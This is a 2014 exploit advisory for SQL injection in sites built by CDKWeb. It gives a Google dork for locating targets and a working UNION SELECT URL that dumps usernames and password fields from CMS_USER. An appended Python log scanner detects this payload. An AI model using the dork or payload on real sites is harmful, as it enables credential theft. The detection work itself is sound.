Sites designed by CDKWeb suffer from a remote SQL injection vulnerability.
==== Exploit Author: Th3 R0cksT3r ====
# Exploit Title: CDKWeb SQL injection
# Date: 06.02.2014
# Email: th3rockst3r@gmail.com
# Vendor Homepage: http://www.cdkweb.com/
# Facebook: Facebook.com/thee.rocksTer
# Google Dork: inurl:.php?id= intext:Website Design and Web Development by CDKWeb
# Risk: High
===Description===
An attacker can read database information through this vulnerability.
Proof Of Concept:
http://www.site.com/pressReleaseDetails.php?id=-136/%27+UNION+SELECT+1,2,3,4,group_concat%28id,0x3a,username,0x3a,password%29,6,7,8+from+CMS_USER--+
===Solution===
Upgrade to the latest version.
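Added example, not part of the original advisory: a log check that flags requests to pressReleaseDetails.php whose id parameter is not a plain integer, which is how the proof of concept above appears in an access log. The log lines are constructed, and the combined log format and the rule that id is always numeric are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format); clients and timestamps are made up.
SAMPLE_LOG = """\
203.0.113.7 - - [06/Feb/2014:10:01:02 +0000] "GET /pressReleaseDetails.php?id=136 HTTP/1.1" 200 5120
203.0.113.9 - - [06/Feb/2014:10:03:44 +0000] "GET /pressReleaseDetails.php?id=-136/%27+UNION+SELECT+1,2,3,4,group_concat%28id,0x3a,username,0x3a,password%29,6,7,8+from+CMS_USER--+ HTTP/1.1" 200 6011
203.0.113.7 - - [06/Feb/2014:10:04:10 +0000] "GET /index.php HTTP/1.1" 200 900
203.0.113.12 - - [06/Feb/2014:10:05:31 +0000] "GET /pressReleaseDetails.php?id=latest HTTP/1.1" 200 4800
"""

# Client address and request target from one log line.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')
# SQL fragments that have no place in a numeric id (checked after URL decoding).
SQL_TOKENS = re.compile(r"\bunion\b.+\bselect\b|group_concat\s*\(|--\s*$|/\*", re.I)

def classify_id(value):
    """Return None for a clean integer id, else a reason string."""
    if re.fullmatch(r"\d{1,10}", value):
        return None
    if "'" in value or SQL_TOKENS.search(value):
        return "sqli_pattern"
    return "non_integer_id"

def scan(log_text, page="pressReleaseDetails.php"):
    """Return (client, reason, decoded_id) for every suspicious request to `page`."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/" + page):
            continue
        # parse_qs decodes %27/%28/%29 and turns '+' into spaces, as the server does.
        for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
            reason = classify_id(value)
            if reason:
                findings.append((client, reason, value))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same strict-integer rule belongs in the application itself: reject or cast id before it reaches the query, and bind it as a parameter rather than concatenating it into SQL.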
# Greetz: Back Bone, Demon, Orions Hunter, Dark Knight Sparda, Gh0st KilL3r, Luge, Code Breaker, Darklord, Devil Prince, Rakhal Beduin, Bakeer Bhai, R007 C0D3, Dipto, 8l@ck 3xplor3r, Sparrow, Bd Matrix, Cyber Blader, Batchfweak and BD BLACK HAT